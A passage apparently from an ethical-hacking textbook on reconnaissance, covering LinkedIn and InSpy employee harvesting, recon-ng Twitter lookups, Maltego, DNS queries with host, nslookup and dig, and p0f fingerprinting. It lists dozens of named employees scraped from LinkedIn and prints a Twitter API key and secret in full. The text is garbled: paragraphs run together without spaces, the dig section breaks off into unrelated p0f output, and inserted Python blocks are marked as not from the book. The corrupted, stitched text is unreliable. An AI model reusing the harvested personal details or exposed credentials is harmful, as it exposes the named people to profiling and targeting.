FacebookpermissionssettingsSometimes,peoplewillpostastatusabouttheirjob,includingwhattheymayhavebeendoingthatday,ortheymaycheckinatanotherjobsite.Anyofthisinformationcouldpotentiallybeusefultoyou.However,siteslikeFacebookarenotalwaysthebestplacetogetinformationaboutbusinessesandtheiremployees.Thereareothersocialnetworkingsitesthatcanbeabitmoreproductiveforyou.OpenSourceIntelligence 
LinkedIn

LinkedIn has been around for about a decade and a half as of the time of this writing. In spite of a number of competitors (such as Plaxo) going out of business or just no longer being in the space, LinkedIn is still around. It continues to expand its offerings beyond the very early days, when it was basically a contact manager. These days, LinkedIn is a business networking opportunity, highly useful for those in sales. It is also a great source for identifying jobs you may be interested in. It seems like human resources people, specifically recruiters, commonly use LinkedIn to find people to fill positions, whether it's an internal recruiter or someone who works for a recruiting company.

Because of the amount of business information LinkedIn collects, we can make use of it as a hunting platform. Especially with the paid memberships, LinkedIn does a lot of analytics about the businesses that make use of it, as well as the people who are on the site. If you are looking for information about a target, LinkedIn provides a lot of detail. Just as one example, Figure 4.9 shows some statistics about applicants for a position that is open and advertised through the Jobs section of the website. We can see that the position attracts educated applicants. You can start to get a sense of the workforce by looking at these statistics across multiple positions.

FIGURE 4.9 LinkedIn job statistics

Job listings are another place to look for details beyond the statistics about applicants and the workforce overall. What we can see from these listings is technology that may be in place within the organization. A listing for a network security engineer has requirements as shown in Figure 4.10. While some of these requirements are generic, there are also some that are very specific about the technology in use in the network. For example, it appears that the company may be using Check Point and Palo Alto Networks firewalls. Additionally, it has Cisco routers and switches in its network. This is a foothold. We can now start thinking about how to attack that sort of infrastructure. Cisco devices, for sure, have tools that can be run against them for various auditing and attack purposes.

FIGURE 4.10 Job requirements for a network security engineer

We don't have to limit ourselves to the web interface, though, since it can be tedious to keep typing things and flicking through pages. Instead, we can use the program InSpy. This is available as a package that can be installed on Kali Linux. It's a Python script, though, that can be run from anywhere if you want to download it to another system. Running InSpy, we can gather job listings based on a list of technology requirements. If you provide a text file with the technology you want to look for, InSpy will look for jobs at a company you specify that match those technologies.

Beyond jobs, though, we can use LinkedIn to harvest information about people. There are a couple of reasons to look up people. One is just to get some names and titles that you may use later. Another is that even if job descriptions don't have information about technology, when people post their job responsibilities, they very often do. You can also get details about their certifications. Someone with a load of Cisco certifications, for example, is probably employed at a company that has a lot of Cisco equipment. Don't overlook nontechnical roles either. Anyone may provide a little insight into what you may find in the organization. You may get information about telephone systems and document management systems that the company uses, even if the employee isn't an administrator.

Again, we turn to InSpy for a little help here. We provide a text file with titles in it. Providing partial titles works. The text file I am using for our little foray here just has the words engineer, editor, and analyst in it. You'll see in the following code that the titles returned include more words than just those. This means you don't have to be exact about the titles you are looking for. You do have to provide a file, though. InSpy won't just search blindly through LinkedIn for every person at a particular company. In addition to the text file, you tell InSpy what company you are looking at. You can see the command line used to call the program as well as a partial listing of people. This particular search returned 59 people, so only some of them are shown here, just to give you a sense of the types of responses you can get.

InSpy Results from an Employee Search

$ inspy --empspy title-list-small.txt Wiley
InSpy 2.0.3

2018-07-02 16:00:52 59 Employees identified
2018-07-02 16:00:52 Felix R Cabral Sr. Avaya Voice Engineer – Voice Infrastructure
2018-07-02 16:00:52 Uta Goebel Deputy Editor at Wiley VCH
2018-07-02 16:00:52 Janice Cruz (L.I.O.N.) Quality Assurance Analyst at Wiley Education Solut
2018-07-02 16:00:52 Coral Nuñez Puras Financial Planning and Analyst in Wiley
2018-07-02 16:00:52 Jamie Wielgus Editor at John Wiley and Sons
2018-07-02 16:00:52 Stacy Gerhardt Engineer in Training at Wiley|Wilson
2018-07-02 16:00:52 Martin Graf-Utzmann Editor at Wiley VCH
2018-07-02 16:00:52 James Smith, EIT Mechanical Engineer at Wiley|Wilson
2018-07-02 16:00:52 Mohammad Karazoun Software Test Engineer (Product Analyst) at John W
2018-07-02 16:00:52 Robert Vocile Strategic Market Analyst at Wiley
2018-07-02 16:00:52 Misha Davidof Senior Business Analyst Consultant at Wiley
2018-07-02 16:00:52 Aleksandr Lukashevich Automation Testing Engineer at John Wiley and Sons
2018-07-02 16:00:52 Ekaterina Perets, Ph.D. Assistant editor at Wiley
2018-07-02 16:00:52 Guangchen Xu Editor @ Wiley
2018-07-02 16:00:52 Ralf Henkel Editor In Chief at Wiley-Blackwell
2018-07-02 16:00:52 sonal jain Wiley India
2018-07-02 16:00:52 Abhinay Kanneti QA Automation Engineer at Wiley Publishing
2018-07-02 16:00:52 Olga Roginkin, PMP Business Analyst at John Wiley and Sons
2018-07-02 16:00:52 Razi Gharaybeh Senior Quality Assurance Engineer at John Wiley an
2018-07-02 16:00:52 Daniel Bleyer Senior SCCM Systems Engineer at Wiley
2018-07-02 16:00:52 John Coughlan Senior Project Engineer at Wiley
2018-07-02 16:00:52 Stephanie Hill Production Editor at Wiley
2018-07-02 16:00:52 Jörn Ritterbusch Editor-in-Chief bei Wiley-VCH
2018-07-02 16:00:52 Alden Farrar Assistant Editor at Wiley
2018-07-02 16:00:52 Gilat Mandelbaum Strategy Analyst Intern at Wiley
2018-07-02 16:00:52 Chelsea Meade Pricing Analyst at Wiley
2018-07-02 16:00:52 Babak Mostaghaci Associate Editor at Wiley-VCH
2018-07-02 16:00:52 Vibhushita Misra Testing Analyst / Testing Team Lead at Wiley
2018-07-02 16:00:52 Mohammed Mnayyes Quality Engineer at John Wiley and Sons
2018-07-02 16:00:52 David Kim Associate Editor | Society Journals | Wiley
2018-07-02 16:00:52 Lauren Elliss Project Engineer at Wiley
2018-07-02 16:00:52 Amit Wawdhane Data Analyst at Wiley | Masters in Information Sys

InSpy is not the only utility we can use to do automatic searches in LinkedIn. We can also use theHarvester, just as we did earlier. Instead of search sites like Google or Bing, we can indicate LinkedIn as the data source to search in. Fortunately, this is something theHarvester will do without requiring an API key. Many sites will require API keys for programmatic access. It maintains some level of accountability and prevents the service from being overused or misused.

Twitter

Another common social networking site or service is Twitter. There is a lot posted to Twitter that can be of some use. Again, programmatic access to Twitter is useful. You can search using the regular interface, but it's sometimes helpful to be able to use other tools. To gain access to Twitter programmatically, you need to get an API key. This means you need to tell Twitter you are creating an application. You can easily tell Twitter you are creating an application without any special credentials through the Twitter developer's website. When you go through the process to create an application, what you are doing is creating identification information that your app needs to interact with the Twitter service. In Figure 4.11, you can see keys and access tokens for an app. What you may notice in Figure 4.11 is that the app is named recon-ng-me. The reason for this is that I created the app just to get the key and token so I could add it into recon-ng, a tool used for reconnaissance that includes many plugins. Some of these plugins require API keys or access tokens to be able to interact with the service being queried. That's the case with the Twitter plugin. In the following code, you can see the list of API keys that recon-ng uses and the API keys set for Twitter.

FIGURE 4.11 Twitter keys and access tokens

recon-ng Keys

[recon-ng][default] > keys list

  +-------------------------------------------------------------------------+
  | Name             | Value                                                |
  +-------------------------------------------------------------------------+
  | bing_api         |                                                      |
  | builtwith_api    |                                                      |
  | censysio_id      |                                                      |
  | censysio_secret  |                                                      |
  | flickr_api       |                                                      |
  | fullcontact_api  |                                                      |
  | github_api       |                                                      |
  | google_api       |                                                      |
  | google_cse       |                                                      |
  | hashes_api       |                                                      |
  | ipinfodb_api     |                                                      |
  | jigsaw_api       |                                                      |
  | jigsaw_password  |                                                      |
  | jigsaw_username  |                                                      |
  | pwnedlist_api    |                                                      |
  | pwnedlist_iv     |                                                      |
  | pwnedlist_secret |                                                      |
  | shodan_api       |                                                      |
  | twitter_api      | 0DE6bQv89M2AApxCvzfX7AIpd                            |
  | twitter_secret   | jxhcaFu9FS8AK9g4m6N9OrhkuCQoP6A5ppgSdckOIf3zhD3cMK   |
  +-------------------------------------------------------------------------+

Now that we have the API key in place for Twitter, we can run the module. To run the module, we have to "use" it, meaning we load the module with the use command. Once it's loaded, we have to set a source. In our case, the source is a text string, so it's in quotes, telling recon-ng that we are using a text string for the source. The text string expected here is a user handle. The word recon was selected somewhat randomly, and it got results. Once that's done, all we need to do is run the module. You can see loading the module, setting the source, and running it in the following code. The results from the module are truncated because there were quite a few of them, and this is just to show you how to use the module.

Using Twitter Module in recon-ng

[recon-ng][default] > use recon/profiles-profiles/twitter_mentions
[recon-ng][default][twitter_mentions] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  LIMIT   True           yes       toggle rate limiting
  SOURCE  default        yes       source of input (see 'show info' for details)

[recon-ng][default][twitter_mentions] > set SOURCE 'recon'
SOURCE => 'recon'
[recon-ng][default][twitter_mentions] > run

-------
'RECON'
-------
[*] [profile] MattyVsTheWorld - Twitter (https://twitter.com/MattyVsTheWorld)
[*] [profile] upthevilla76 - Twitter (https://twitter.com/upthevilla76)
[*] [profile] davidsummers64 - Twitter (https://twitter.com/davidsummers64)
[*] [profile] nastypig99 - Twitter (https://twitter.com/nastypig99)
[*] [profile] rothschildmd - Twitter (https://twitter.com/rothschildmd)
[*] [profile] CamillaPayne7 - Twitter (https://twitter.com/CamillaPayne7)
[*] [profile] Matt5cott - Twitter (https://twitter.com/Matt5cott)
[*] [profile] AVFCOfficial - Twitter (https://twitter.com/AVFCOfficial)
[*] [profile] CamillaPayne7 - Twitter (https://twitter.com/CamillaPayne7)
[*] [profile] Matt5cott - Twitter (https://twitter.com/Matt5cott)
[*] [profile] AVFCOfficial - Twitter (https://twitter.com/AVFCOfficial)
[*] [profile] yorkshireAVFC - Twitter (https://twitter.com/yorkshireAVFC)

Because we are running the twitter_mentions module, we are using the text string to search for mentions in Twitter. What we get back are profiles of users that were mentioned by the given handle. You could do the reverse of these results with the twitter_mentioned module, which returns profiles that mentioned the specified handle. Finally, we can look for tweets that happened in a given geographic area using the locations-pushpin/twitter module. We can specify a radius in kilometers within which we want to search using this module.

There is another tool that's useful for reconnaissance overall, but since it has Twitter abilities, we'll take a look at it here. Maltego uses a visual approach by creating graphs from the data that has been collected. It can be useful to have entity relationships identified, like parent-child relationships between pieces of data. Maltego uses transforms to pivot from one piece of information to another. A collection of transforms is called a machine, and it's a good place to start. Figure 4.12 shows part of the output from Twitter Digger X, which analyzes tweets from the username provided. As you can see, you get a graph that is structured like a tree. This is because every piece of data collected can potentially yield another piece, which would be a child.

FIGURE 4.12 Maltego graph from Twitter

Maltego can be a good tool to collect reconnaissance data, especially if you want a visual representation of it. While there are several other tools that can collect the same data Maltego does, Maltego does have the advantage of giving you a quick way to collect additional data by just selecting a node on the graph and running a transform on it to pivot to another data collection tool. You can start with a hostname, for instance, and collect an IP address from it by just running a transform. There are additional Twitter machines and transforms aside from Twitter Digger X. You can also monitor Twitter for the use of hashtags, for example. This provides a lot of capability, in addition to all of the other capabilities, to search Twitter from inside Maltego.

Activity
Obtain a copy of Maltego Community Edition (available preinstalled in Kali Linux). Use Maltego to locate as much information about yourself as you can using the machines and transforms available.

Job Sites

Earlier we looked at LinkedIn as a source of information. One area of information we were able to gather from LinkedIn was job descriptions, leading to some insights about what technology is being used at some organizations. For example, Figure 4.13 shows some qualifications for an open position. This is for a senior DevOps engineer, and the listing was on indeed.com. While the technologies are listed as examples, you certainly have some starting points. You know the company is using relational databases. This isn't surprising, perhaps, since so many companies are using them. It does tell you, though, that they aren't using NoSQL, which includes things like MongoDB and Redis. You also know that they are using Amazon Web Services. Since they are looking for someone certified there, this is a certainty.

FIGURE 4.13 Job listing with technologies

If you wanted to try to do something through the web application, you know they are using RESTful interfaces for the application. It's not much, but it's a starting point. As you look over job listings, you start to be able to read them with an eye toward picking out potential targets. After you've been reading them for a while, you will start to pick out some of the language of these listings. As an example, the listing uses the word like in several of the lines. While you can't get a complete line on what is used, you can certainly rule some things out, as we did earlier.

There are a lot of places to go looking for job listings. While in the old days we used newspapers, and you'd have to get a newspaper in the region you wanted to look for a job in (or scare up information about a company you were trying to research), now job postings are everywhere online. Some of the big websites you might use are Monster, Indeed, Glassdoor, CareerBuilder, and Dice. You should also keep the company itself in mind. While many companies use the job posting sites, there may be some companies that post jobs on their own site, and those may not be available elsewhere. You may also check specialized sites like USAJobs and ClearanceJobs. Any of these job postings may provide you with some insight into not only technology but also organizational structure. As I mentioned earlier, don't focus only on technology
listings. You can gather additional information about the company using other job listings that aren't about technology.

Domain Name System

While you can gather a lot of information at a distance, at some point you need to dive in. This still doesn't mean you are going fully active, but you're going to start gathering details about the scope of what we are dealing with. When you interact with systems on your target, and every other system as well, you need to communicate with an IP address. However, humans aren't good at remembering strings of numbers. Instead, we use hostnames, but that means we need something that will translate these hostnames into IP addresses for us. This is where the DNS comes in.

DNS is a tiered system, and it's tiered in a couple of ways. First is the hostnames we use. I can use an example here to help demonstrate. www.labs.domain.com is a hostname because it refers to a specific host or system. It's best to read the hostname from right to left, because that's how DNS will read it when it comes time to resolve the hostname to an IP address. In the beginning were the top-level domains (TLDs), and they were .com, .org, and .edu, as well as all the ones for the different countries (.uk, .au, .ca, .sk, .us, and so on). Later, many more were added, but they are all still TLDs. They are considered top-level domains because you might graph DNS like a tree. All the TLDs would be at the top, and then everything grew out from those TLDs.

Second-level domains are where we start adding in organizations. The TLDs belong to the Internet at large, so to speak. They have organizations that manage them, but they don't "belong" to any one organization, at least not in the way the second-level domains can be said to. In our example, the second-level domain would be domain. When people refer to domains, they generally refer to the second-level domain along with the TLD, or domain.com in our example. Under second-level domains are subdomains. Every domain can have as many levels of subdomains as its owners are willing to manage. We have a subdomain in the example. The subdomain is labs, and it belongs to the domain domain.com. When we add www, which is the hostname, to the subdomain, the second-level domain, and the TLD, we end up with something called a fully qualified domain name (FQDN). It's fully qualified because it's clear what domain the hostname belongs to (the hostname www, for instance, exists in countless domains) and it's also clear what hostname in the domain we are talking about. You may recognize the three letters www as standing for World Wide Web, which it also stands for here. When the letters are meant to refer to the World Wide Web, they are capitalized—WWW. When you see www, it will refer to a hostname rather than the overall World Wide Web.

Now that you have a basic understanding of the naming structure used within DNS and a basic understanding of what DNS is used for, we can start looking at how you might use DNS to gather information about your targets. First, we'll start with name lookups. This includes how a name lookup actually works, and then we'll look at some tools that can be used to perform the name lookups. After that, we'll look at doing zone transfers, which are essentially bulk name lookups.

Name Lookups

When you visit a website, you enter something called a Uniform Resource Locator (URL). The URL consists, commonly, of two parts. The first is the Uniform Resource Identifier (URI). This is the protocol used (e.g., http:// or ftp://). Following the URI is the FQDN. Your browser will issue a request to the operating system to open a connection to the FQDN at the port indicated by the URI. Before the connection can be opened, however, the system needs to have an IP address to put into the layer 3 headers. So, it issues a name resolution request. Each computer will have at least one name resolver configured. The name resolver is the system your computer goes to in order to accomplish the name resolution.

This description assumes that your computer has never visited the site before. Your system will commonly cache the resolved address so it doesn't have to generate network traffic to ask again. Similarly, the resolver your system asks will also generally cache results so it doesn't have to keep asking the authoritative server. We similarly assume that no other system using the same resolver has requested the information, resulting in a fresh request.

The name resolver is a DNS server. It takes in DNS requests and resolves them, based on what is being asked. Typically, the name resolver you will have configured will be what is called a caching name server. This means it gets requests from endpoints, resolves them, and caches the results for efficiency. This is distinct from what is known as an authoritative server, which holds the records for a given domain. We'll get to authoritative servers shortly. So, the first DNS request is the one from your system to the caching server, wherever it happens to be located. Figure 4.14 shows a basic flow of how a complete DNS name resolution would work, so you can follow along there.

We start with the request labeled A. This goes to the name resolver, labeled Caching DNS. The caching DNS server checks its cache and sees that it has no IP address stored, so it begins something called a recursive name query or recursive name resolution. It's called recursive because it will end up with multiple requests that keep getting narrower until we end up with what we want. The caching server will need to start with the TLD. It will have a hints file, indicating the IP addresses for the root name servers. For our example, the caching server will need to identify the server to use for the .com TLD. Once it has identified the server it needs to send a request to, request B goes out, asking the root server for the IP address of the name server for the domain.com domain.

FIGURE 4.14 DNS name resolution (Your PC -> A -> Caching DNS; B -> Root Server; C -> domain.com; D -> labs.domain.com; E -> www.labs.domain.com)

The root server has the name server details for all the domains that fall under the TLD it is responsible for. The root server will reply to our caching server with the IP address for the name server for domain.com. When we did the whois lookups earlier, at the end of a whois lookup on a domain were the name servers for that domain, since the name servers are stored with the domain. This, though, is why what we are doing is called a recursive query. We can't just ask the root server for the IP address of the hostname, so we have to ask it for a pointer to who to ask next.

Request C is the DNS request asking the name server for domain.com about labs.domain.com. Since labs.domain.com is separate from domain.com, what our caching server gets back is another name server. This means one more request. We are now at the point where the FQDN is being asked for. Request D goes out asking for the IP address of www.labs.domain.com. The authoritative server, which is the one we are asking because it has the authoritative information about that domain, responds with the IP address. It may actually respond with multiple IP addresses, but for our purposes, we're going to just say it comes back with a single IP. Once the caching server has the IP, it sends the response back to our system, which can then issue request E, which isn't a DNS request but a connection request to the web server.

Now that you have a handle on the process we are going through to get IP addresses back from DNS servers, we can start looking at tools we can use to get those addresses.

Using Host

Perhaps the easiest tool to use is host. This is a program that you will find on most Unix-like systems, including Linux systems. It has no Windows analog, unfortunately. If you don't have it installed by default, you can probably get it installed. Using it is very straightforward. You just pass the hostname you want the IP address for to host and you will get a response. You can see an example of that in the following code.

DNS Lookup Using host

$ host www.sybex.com
www.sybex.com has address 208.215.179.132

$ host www.sybex.com 4.2.2.1
Using domain server:
Name: 4.2.2.1
Address: 4.2.2.1#53
Aliases:

www.sybex.com has address 208.215.179.132

$ host 208.215.179.132
132.179.215.208.in-addr.arpa domain name pointer motorfluctuations.net.
132.179.215.208.in-addr.arpa domain name pointer managementencyclopedia.org.
132.179.215.208.in-addr.arpa domain name pointer smdashboard.wiley.com.
132.179.215.208.in-addr.arpa domain name pointer elansguides.com.
132.179.215.208.in-addr.arpa domain name pointer currentprotocols.net.
132.179.215.208.in-addr.arpa domain name pointer geographyencyclopedia.com.
132.179.215.208.in-addr.arpa domain name pointer separationsnow.info.
132.179.215.208.in-addr.arpa domain name pointer jcsm-journal.com.
132.179.215.208.in-addr.arpa domain name pointer literature-compass.com.

In addition to just a straightforward lookup of a hostname to an IP address, we can use a different server than the one that is defined as our resolver. You can see in the second request that I added an IP address to the command line. This IP address is a caching server that is available for anyone to use. It was created by GTE Internetworking and has been around for at least the better part of a couple of decades at this point. Since it is also a caching server that is open for anyone to use, we can issue requests to it and it will go through the same process described earlier, just as if it were our own caching server.
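The resolution walk above (requests B, C and D, with request A answered from cache on a repeat lookup) and the in-addr.arpa name behind the reverse lookup shown with host, as an added Python illustration that is not code from the book. All server addresses and zone data in it are constructed; following the figure, the root server hands out the domain.com name server directly, where the real DNS would insert a .com TLD referral in between.

```python
"""Iterative DNS resolution walk with a caching resolver (constructed example)."""
from dataclasses import dataclass, field

ROOT_HINT = "198.51.100.0"  # constructed: what the resolver's hints file would point at

# Constructed authoritative data, one entry per name server.  A server either
# answers from its own records or hands back a referral to the server that is
# responsible for a child zone (the NS record in real DNS).  The root delegating
# domain.com directly mirrors the book's figure; real DNS has a .com hop first.
SERVERS = {
    "198.51.100.0": {  # root server
        "zone": ".",
        "records": {},
        "delegations": {"domain.com": "198.51.100.2"},
    },
    "198.51.100.2": {  # authoritative for domain.com
        "zone": "domain.com",
        "records": {"www.domain.com": "203.0.113.10"},
        "delegations": {"labs.domain.com": "198.51.100.3"},
    },
    "198.51.100.3": {  # authoritative for labs.domain.com
        "zone": "labs.domain.com",
        "records": {"www.labs.domain.com": "203.0.113.20"},
        "delegations": {},
    },
}


def query_server(server_ip, qname):
    """One request to one name server.

    Returns ("answer", ip), ("referral", next_server_ip) or ("nxdomain", None).
    """
    srv = SERVERS[server_ip]
    if qname in srv["records"]:
        return "answer", srv["records"][qname]
    # Longest delegated child zone that qname falls under (names read right to left).
    best = None
    for child in srv["delegations"]:
        if qname == child or qname.endswith("." + child):
            if best is None or len(child) > len(best):
                best = child
    if best is not None:
        return "referral", srv["delegations"][best]
    return "nxdomain", None


@dataclass
class CachingResolver:
    """The caching DNS server of the figure: answers from cache when it can,
    otherwise walks from the root following referrals and caches the result."""
    cache: dict = field(default_factory=dict)
    max_hops: int = 10  # guard against referral loops in broken delegations

    def resolve(self, qname):
        """Return (ip_or_None, list of servers queried in order)."""
        if qname in self.cache:
            return self.cache[qname], []  # request A answered from cache, no walk
        queried, server = [], ROOT_HINT
        for _ in range(self.max_hops):
            queried.append(server)
            kind, value = query_server(server, qname)
            if kind == "answer":
                self.cache[qname] = value
                return value, queried
            if kind == "nxdomain":
                return None, queried
            server = value  # follow the referral (requests B, C, D in the figure)
        raise RuntimeError("referral loop while resolving %s" % qname)


def reverse_name(ipv4):
    """Name queried for a reverse (PTR) lookup, as 'host 208.215.179.132' does."""
    octets = ipv4.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError("not an IPv4 address: %r" % ipv4)
    return ".".join(reversed(octets)) + ".in-addr.arpa"


if __name__ == "__main__":
    resolver = CachingResolver()
    print(resolver.resolve("www.labs.domain.com"))  # root -> domain.com -> labs.domain.com
    print(resolver.resolve("www.labs.domain.com"))  # second time: cache hit, nobody queried
    print(reverse_name("208.215.179.132"))
```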
You can also see from the example, where it says host 208.215.179.132, that you can look up a hostname from an IP address. Every address block will have a DNS server that belongs to it. This means that requests can be issued to the DNS server for an address block to do something called a reverse lookup, meaning that we have an IP address and we want the hostname that's associated with it. As you can see, often an IP address will have several hostnames associated with it. This may be the case where a web server is hosting virtual servers—meaning the web server can determine what content to serve up based on the hostname in the request. The request for this IP address resulted in 197 responses, but they have been truncated for space.

Using nslookup

Another tool that can be used is nslookup. This can be used just like the program host, meaning you could just run nslookup www.sybex.com and get a response. An advantage to nslookup, however, is that you can issue many requests without having to keep running nslookup. When you run nslookup without any parameters, you will be placed into an nslookup shell, where you are interacting with the program, issuing requests. In the following code, you can see an exchange in nslookup. We are ultimately looking for the same information as we got earlier using host, but we are going about it in a different manner.

Using nslookup for Name Resolution

$ nslookup
> set type=ns
> sybex.com
Server:         192.168.86.1
Address:        192.168.86.1#53

Non-authoritative answer:
sybex.com       nameserver = jws-edcp.wiley.com.
sybex.com       nameserver = ns.wiley.co.uk.
sybex.com       nameserver = ns2.wiley.co.uk.
sybex.com       nameserver = sg-ns01.wiley.com.
sybex.com       nameserver = bri-ns01.wiley.com.
sybex.com       nameserver = ns.wileypub.com.

Authoritative answers can be found from:
> set type=A
> server ns.wileypub.com.
Default server: ns.wileypub.com.
Address: 12.165.240.53#53
> www.sybex.com
Server:         ns.wileypub.com.
Address:        12.165.240.53#53

Name:   www.sybex.com
Address: 208.215.179.132

Instead of just looking up the IP address from the hostname, I used resource records to start. DNS supports multiple resource records, though the most common is the address (A) record. When you see set type=ns, I'm telling nslookup to issue subsequent requests asking for name server (NS) records. This will tell us the authoritative name servers for the given domain. Once I had the list of NSs, I was able to set the server I was asking to one of the NSs. What this means is that instead of going to my caching server, nslookup is going to issue a DNS request directly to the authoritative server, which wouldn't have to do any recursive search since it has the information being requested.

Using dig

The program dig is another utility that can be used for name resolutions. It also supports the same things we have been doing, meaning we can indicate a different name server and also request different resource records. An example using dig can be seen in the following code. The command line has all the information for the request, including the resource record type, the request, and also the server dig should issue the request to.

Using dig for [email protected]
; [email protected]
;; global options: +cmd
;; Got answer:
;; ->>HEADER

8.43.72.22/443 (syn) ]-
|
| client   = 192.168.86.45/46112
| os       = Linux 3.11 and newer
| dist     = 0
| params   = none
| raw_sig  = 4:64+0:0:1460:mss*20,7:mss,sok,ts,nop,ws:df,id+:0
|
`----

.-[ 192.168.86.45/46112 -> 8.43.72.22/443 (mtu) ]-
|
| client   = 192.168.86.45/46112
| link     = Ethernet or modem
| raw_mtu  = 1500
|
`----

.-[ 192.168.86.45/46112 -> 8.43.72.22/443 (uptime) ]-
|
| client   = 192.168.86.45/46112
| uptime   = 48 days 7 hrs 54 min (modulo 49 days)
| raw_freq = 1000.00 Hz
|
`----

.-[ 192.168.86.45/33498 -> 52.94.210.45/443 (syn) ]-
|
| client   = 192.168.86.45/33498
| os       = Linux 3.11 and newer
| dist     = 0
| params   = none
| raw_sig  = 4:64+0:0:1460:mss*20,7:mss,sok,ts,nop,ws:df,id+:0
|
`----

.-[ 192.168.86.45/33498 -> 52.94.210.45/443 (host change) ]-
|
| client   = 192.168.86.45/33498
| reason   = tstamp port
| raw_hits = 0,1,1,1
|
`----

Very little of what you see here is anything you wouldn't be able to determine yourself if you knew how to read packet headers. The packet capture and analysis program Wireshark could provide much of this information. Some of the interesting bits, though, include identifying system uptime. This is the uptime on systems on my local network, so it's less interesting, perhaps, than it would be if we could so easily identify uptime on remote systems.

You can also see that p0f is able to identify the operating system type on some systems. It happens to be the system that p0f is running on, but it makes the determination based on the network headers, since operating systems have different "signatures" that are based on how the IP identification number is generated, how the TCP sequence number is generated, how ephemeral port numbers are selected, and other pieces of information p0f can collect.

While we are talking about passive reconnaissance, we should look at some web-based tools that suggest they do passive reconnaissance. One of them was named PassiveRecon, though it hasn't been updated in years and may not be available. It can be found as an add-on for Firefox, but only for certain versions of Firefox. One of the nice things about PassiveRecon, though I'm not sure it could be properly called passive reconnaissance, is that it made DNS, whois, and related tools available as a context menu selection on any link. You could quickly get information about the site you had selected. If PassiveRecon isn't available, you can take a look at some other tools. One of them, though it doesn't behave quite the same, is R3con. This is a plugin for Firefox.
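The raw_sig line in the p0f output above packs those header characteristics into one string; the p0f v3 layout is ver:ittl:olen:mss:wsize,scale:olayout:quirks:pclass. The following Python parser is added here and is not code from the book or from p0f; it splits an observation block like the ones above into named fields, and the sample block it runs on is copied from the output above.

```python
"""Parse p0f 3.x observation blocks and raw_sig strings (added example)."""
import re

# Sample block copied from the p0f output shown above.
SAMPLE_BLOCK = """\
.-[ 192.168.86.45/33498 -> 52.94.210.45/443 (syn) ]-
|
| client   = 192.168.86.45/33498
| os       = Linux 3.11 and newer
| dist     = 0
| params   = none
| raw_sig  = 4:64+0:0:1460:mss*20,7:mss,sok,ts,nop,ws:df,id+:0
|
`----
"""

# Block header: .-[ src/port -> dst/port (module) ]-
HEADER_RE = re.compile(r"^\.-\[ (\S+) -> (\S+) \(([^)]+)\) \]-$")


def parse_block(text):
    """Return a dict with src, dst, module and every 'key = value' line of a block."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    m = HEADER_RE.match(lines[0])
    if not m:
        raise ValueError("not a p0f block header: %r" % lines[0])
    out = {"src": m.group(1), "dst": m.group(2), "module": m.group(3)}
    for ln in lines[1:]:
        if ln.startswith("|") and "=" in ln:
            key, _, val = ln[1:].partition("=")
            out[key.strip()] = val.strip()
    return out


def parse_raw_sig(sig):
    """Split a p0f TCP signature into named fields.

    Layout (p0f v3): ver:ittl:olen:mss:wsize,scale:olayout:quirks:pclass
    """
    parts = sig.split(":")
    if len(parts) != 8:
        raise ValueError("expected 8 colon-separated fields, got %d" % len(parts))
    ver, ittl, olen, mss, wsize_scale, olayout, quirks, pclass = parts
    # ittl is reported as observed_ttl+distance; their sum is the OS's initial TTL.
    if "+" in ittl:
        observed, dist = ittl.split("+")
        initial_ttl, distance = int(observed) + int(dist), int(dist)
    else:
        initial_ttl, distance = int(ittl.rstrip("-")), None
    wsize, _, scale = wsize_scale.partition(",")
    return {
        "ip_version": ver,
        "initial_ttl": initial_ttl,
        "distance": distance,
        "ip_opt_len": int(olen),
        "mss": None if mss == "*" else int(mss),
        "wsize": wsize,  # e.g. 'mss*20' (a multiple of the MSS) or a plain number
        "wscale": None if scale in ("", "*") else int(scale),
        "olayout": olayout.split(",") if olayout else [],  # TCP option order
        "quirks": quirks.split(",") if quirks else [],  # e.g. df, id+
        "payload_class": pclass,  # '0' = no payload on the SYN, '+' = payload
    }


def window_bytes(fields):
    """Resolve an 'mss*N' window expression to bytes; None when it cannot be known."""
    w = fields["wsize"]
    if w.isdigit():
        return int(w)
    base, _, mult = w.partition("*")
    if base == "mss" and fields["mss"] is not None and mult.isdigit():
        return fields["mss"] * int(mult)
    return None  # '*' or mtu-based windows need more than the signature carries


if __name__ == "__main__":
    block = parse_block(SAMPLE_BLOCK)
    fields = parse_raw_sig(block["raw_sig"])
    print(block["os"], fields, window_bytes(fields))
```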
ginforFirefox.Whenyouactivateit,awindowthatlookslikewhatyouseeinFigure 4.15opens.Youwillhavemultipletabswitheditboxesonthem,expectinginputdependingonwhatyouwanttolookup.Thetabshownisthewhoistab,whichexpectsadomainnameoranIPaddress,justaswhenweusedwhoisearlier.FIGURE 4.15 ReconwithR3conYoumaynotbeusingFirefox,thoughwhatyou’llprobablyfindisthatthebrowserthathasthemajorityofpluginsthatareusefulforsecuritytestingisFirefox.IusedtojokethatFirefoxwasthebrowserthatwasinsecureenoughtoallowpluginsaccesstodoallsortsofbadthings.Thisisn’ttrue,ofcourse.PluginshavebeenaroundforFirefoxmuchlongerWebsiteIntelligence 139thanforotherbrowsers,sothedevelopmentcommunityhasbeenaroundforawhile.Otherbrowsers,likeChrome,canbemuchmorerestrictiveinwhattheywillallowdeveloperstodo,though,whichalsomakesFirefoxmoreattractive.OnepluginorextensionavailableinChromeisRecon.ThisismuchlikePassiveReconinthatitprovidesacontextmenuwhenyouright-­clickalinkinapage.TheReconmenugivesyouquickaccesstolookupinformationaboutthelinkorwordyouhaveselected.YoucandoGoogleorBingsearches,forexample,andReconwillopenanewtaborwindowwiththeresultsofasearchonwhatyouhaveselected.Youcanalsogettranslationsofwords,dopackagetracking,searchvideosites,andperformanumberofotherquicksearcheswhereyourselectionispassedintothesiteyouhaveselectedfromthemenu.Thesesortsoftoolscanbeinvaluabletoquicklysearchforanswers,thoughtheyaren’tpassivereconnaissanceinthesamesensethatwatchingnetworktrafficis.However,thisisnotatalltosaythattheinformationyoucangetfromthesetoolsisn’tvaluable.Anytoolthatcansaveyoutimeandmaybeevenexposeyoutoanewtechniqueyoucouldaddtoyourarsenalisveryvaluable.Evenwithallofthis,thereisstillinformationwecanlookatthatwehaven’tseenasyet.WebsiteIntelligenceItwouldbedifficulttofindacompanythathadnowebpresenceatall.It’spossible,ofcourse,thoughit’sunlikely.EvensmallcompaniesprobablyhaveapageonFacebooktoshowthehourstheyareopen.Companiesthatmaybemostpronetoneedtheservicesofanethicalhackertoperformtestingwil